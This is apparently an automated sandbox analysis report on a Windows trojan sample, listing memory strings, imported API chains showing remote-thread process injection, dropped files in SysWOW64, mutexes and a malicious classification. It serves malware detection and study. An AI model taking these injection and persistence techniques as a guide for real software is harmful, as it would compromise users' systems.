Source: explorer.exe, 00000005.00000003.2212309611.000000000BF73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3830834393.000000000BFB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2214265649.000000000BFB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3079859452.000000000BF73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1369884699.000000000BF72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
Source: explorer.exe, 00000005.00000003.2212309611.000000000BF73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3830834393.000000000BFB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2214265649.000000000BFB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3079859452.000000000BF73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1369884699.000000000BF72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSed0JA/:
Source: explorer.exe, 00000005.00000003.2212309611.000000000BF73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3830834393.000000000BFB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2214265649.000000000BFB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3079859452.000000000BF73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1369884699.000000000BF72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSu3
Source: explorer.exe, 00000005.00000000.1360878216.0000000008B3F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2210576179.0000000008B3F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3078024513.0000000008B38000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3824992663.0000000008B09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000005.00000000.1360878216.0000000008B3F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2210576179.0000000008B3F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3078024513.0000000008B38000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3824992663.0000000008B09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/%
Source: explorer.exe, 00000005.00000002.3818820442.00000000031BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000005.00000002.3824992663.00000000089A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1360878216.00000000089A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000005.00000000.1369884699.000000000BF1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2213041567.000000000BF1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3830834393.000000000BF1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comj
Source: explorer.exe, 00000005.00000000.1369884699.000000000BF1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2213041567.000000000BF1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3830834393.000000000BF1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
Source: explorer.exe, 00000005.00000002.3830834393.000000000BEEE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2213041567.000000000BEEE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1369884699.000000000BEEE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000005.00000002.3830834393.000000000BE77000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2213041567.000000000BE77000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1369884699.000000000BE77000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/ilable1
Source: explorer.exe, 00000005.00000000.1369884699.000000000BF1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2213041567.000000000BF1C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3830834393.000000000BF1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,Creat0_2_00403A19
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: 0_2_004019AA CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrlenA,OpenProcess,NtAllocateVirtualMemory,NtWriteVirtualMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualAlloc,lstrcpyA,Process32Next,CloseHandle,CloseHandle,0_2_004019AA
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeCode function: 1_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,Creat1_2_00403A19
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeCode function: 1_2_004019AA CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrlenA,OpenProcess,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualAlloc,lstrcpyA,Process32Next,CloseHandle,CloseHandle,1_2_004019AA
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,Creat0_2_00403A19
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeCode function: 1_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,Creat1_2_00403A19
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeCode function: 3_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,CreateFileA,RegOpenKeyExA,RegOpenKeyExA,lstrlenA,RegSetValueExA,RegClose3_2_00403A19
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeFile created: C:\Windows\SysWOW64\edsuvoov-usum.exeJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeFile created: C:\Windows\SysWOW64\ehmehut.dllJump to behavior
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: 0_2_00403A190_2_00403A19
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeCode function: 1_2_00403A191_2_00403A19
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeCode function: 3_2_00403A193_2_00403A19
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeCode function: String function: 00406718 appears 31 times
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: String function: 00406718 appears 31 times
Source: 5SGOAKv7AR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: classification engineClassification label: mal100.troj.evad.winEXE@5/4@548/4
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,Creat0_2_00403A19
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeFile created: C:\Users\user\AppData\Roaming\tmp5C6F.tmpJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-0A
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-0B
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-0C
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-0D
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-0E
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-0F
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-10
